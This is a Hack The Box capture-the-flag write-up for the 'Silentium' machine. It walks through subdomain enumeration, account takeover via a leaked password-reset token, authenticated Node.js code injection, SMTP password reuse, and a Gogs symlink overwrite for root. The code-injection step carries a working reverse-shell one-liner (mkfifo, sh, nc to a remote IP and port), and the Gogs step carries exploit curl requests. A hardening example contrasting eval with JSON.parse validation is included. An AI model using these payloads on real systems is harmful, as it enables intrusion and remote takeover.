
Hack The Box Silentium Writeup | Account Takeover, RCE, and Root

Hack The Box Silentium writeup covering enumeration, password reset token leak, authenticated RCE, credential reuse, and privilege escalation to root.

Hack The Box Silentium Writeup

Executive Summary

Silentium starts with standard enumeration and subdomain discovery, which exposes a staging application. A password reset information disclosure leads to account takeover, then an authenticated Node.js code execution issue provides shell access. Environment variable leakage enables lateral movement, and root is obtained by exploiting an unpatched Gogs vulnerability.

Target Information

  • Target IP: 10.129.20.2
  • Hostname: silentium.htb

1. Enumeration

Port Scan

nmap -sV -sC -Pn 10.129.20.2

Open ports identified:

  • 22/tcp SSH
  • 80/tcp HTTP (http://silentium.htb/)

Subdomain Discovery

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -u http://silentium.htb/ \
  -H "Host: FUZZ.silentium.htb"

This revealed staging.silentium.htb, which hosted the login portal.

2. Initial Access via Password Reset Leak

Version Check

curl -s http://staging.silentium.htb/api/v1/version

The API returned version 3.0.5, which mapped to known security issues including GHSA-3gcm-f6qx-ff7p.

Password Reset Token Disclosure

During a "Forgot Password" request, the response leaked sensitive user metadata, including tempToken.

{
  "user": {
    "id": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
    "name": "admin",
    "email": "ben@silentium.htb",
    "credential": "$2a$05$6o1ngPjXiRj.EbTK33PhyuzNBn2CLo8.b0lyys3Uht9Bfuos2pWhG",
    "tempToken": "YF0s7nhckWxvIe7Un2c3JLjwN5yxEEngMXtUen91m4LSAKSFq2R8X8zKR0GGQ2Yy",
    "tokenExpiry": "2026-04-12T19:26:25.871Z",
    "status": "active"
  }
}

Using that token at http://staging.silentium.htb/reset-password, I reset ben@silentium.htb and obtained authenticated access.

3. Foothold (Authenticated RCE)

After login, I found /api/v1/node-load-method/customMCP. The mcpServerConfig input was evaluated as Node.js code, enabling command execution.

curl -X POST "http://staging.silentium.htb/api/v1/node-load-method/customMCP" \
  -H "Authorization: Bearer <ACCESS_TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{
    "inputs": {
      "mcpServerConfig": "(global.process.mainModule.require(\"child_process\").exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.15.38 4444 >/tmp/f\"))"
    },
    "loadMethod": "listActions"
  }'

Result: reverse shell as the web service user.
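The underlying defect is that a configuration string supplied by an authenticated user is compiled and executed as JavaScript instead of being parsed as data. As an added example (not code from the application on the target), the block below puts the evaluating pattern next to a parser that uses `JSON.parse` and an explicit key allowlist; the config schema (`command`, `args`, `env`) is assumed for illustration.

```javascript
// Added example, not the target application's code: evaluating a user-supplied
// config string versus parsing it as data and validating its shape.

// Vulnerable pattern: the string is compiled and run, so any expression in it
// executes with the privileges of the Node.js process.
function loadConfigVulnerable(configText) {
  return new Function(`return (${configText});`)();
}

// Assumed schema: each allowed key maps to a predicate on its value.
const SCHEMA = {
  command: (v) => typeof v === 'string' && /^[A-Za-z0-9_./-]+$/.test(v),
  args: (v) => Array.isArray(v) && v.every((a) => typeof a === 'string'),
  env: (v) => v !== null && typeof v === 'object' && !Array.isArray(v)
    && Object.entries(v).every(([k, val]) => /^[A-Z_][A-Z0-9_]*$/.test(k) && typeof val === 'string'),
};

// Hardened pattern: JSON.parse never executes code; the result is checked against
// an allowlist of keys and value shapes, then rebuilt so nothing extra survives.
function loadConfigHardened(configText) {
  let parsed;
  try {
    parsed = JSON.parse(configText);
  } catch (err) {
    throw new Error('config must be valid JSON');
  }
  if (parsed === null || typeof parsed !== 'object' || Array.isArray(parsed)) {
    throw new Error('config must be a JSON object');
  }
  for (const key of Object.keys(parsed)) {
    // Object.keys also surfaces a literal "__proto__" key from JSON, so it is rejected here.
    if (!Object.prototype.hasOwnProperty.call(SCHEMA, key)) {
      throw new Error(`unexpected key: ${key}`);
    }
    if (!SCHEMA[key](parsed[key])) throw new Error(`invalid value for ${key}`);
  }
  if (!('command' in parsed)) throw new Error('command is required');
  return { command: parsed.command, args: parsed.args ?? [], env: parsed.env ?? {} };
}
```

The hardened parser rejects anything that is not a JSON object, any key outside the schema, and any value of the wrong shape, which is what removes the code-execution path entirely rather than trying to filter dangerous substrings out of an expression.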

4. Lateral Movement

I inspected environment variables and recovered SMTP credentials.

env | grep SMTP
# SMTP_PASSWORD= [:sob:]

The password was reused for SSH access as ben.

ssh ben@10.129.20.2

5. Privilege Escalation to Root

Local service enumeration identified Gogs v0.13.3, vulnerable to CVE-2025-8110 (symlink path traversal leading to arbitrary write/RCE).

Using a valid Gogs API token, I abused the repository contents API to overwrite a sensitive file path and obtain root-level execution.

curl -X PUT "http://127.0.0.1:<GOGS_PORT>/api/v1/repos/<USER>/<REPO_NAME>/contents/<SYMLINK_NAME>" \
  -H "Authorization: token <GOGS_API_TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{
    "message": "Exploit: overwrite target file",
    "content": "<BASE64_ENCODED_CONTENT>",
    "sha": "<CURRENT_FILE_SHA>",
    "branch": "master"
  }'

Result: root shell obtained and machine fully compromised.